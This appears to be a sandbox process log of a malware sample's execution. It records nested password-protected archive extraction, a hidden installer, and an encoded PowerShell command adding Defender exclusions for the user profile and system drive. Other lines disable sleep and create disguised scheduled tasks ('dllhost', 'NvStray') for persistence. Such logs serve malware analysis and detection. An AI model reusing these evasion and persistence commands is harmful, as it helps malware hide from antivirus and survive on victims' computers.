mode.com mode 65,10
20647z.exe 7z.exe e file.zip -p32606511521849235062050926056 -oextracted
21447z.exe 7z.exe e extracted/file_9.zip -oextracted
22167z.exe 7z.exe e extracted/file_8.zip -oextracted
11567z.exe 7z.exe e extracted/file_7.zip -oextracted
23247z.exe 7z.exe e extracted/file_6.zip -oextracted
26327z.exe 7z.exe e extracted/file_5.zip -oextracted
27887z.exe 7z.exe e extracted/file_4.zip -oextracted
28007z.exe 7z.exe e extracted/file_3.zip -oextracted
15087z.exe 7z.exe e extracted/file_2.zip -oextracted
17527z.exe 7z.exe e extracted/file_1.zip -oextracted
2848attrib.exe attrib +H "Installer.exe"
2984cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
2188powershell.exe powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA=="
2292powercfg.exe powercfg /x -hibernate-timeout-ac 0
2576powercfg.exe powercfg /x -hibernate-timeout-dc 0
2628powercfg.exe powercfg /x -standby-timeout-ac 0
1552powercfg.exe powercfg /x -standby-timeout-dc 0
2908powercfg.exe powercfg /hibernate off
2944cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2172schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2780cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2840schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2676svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
2940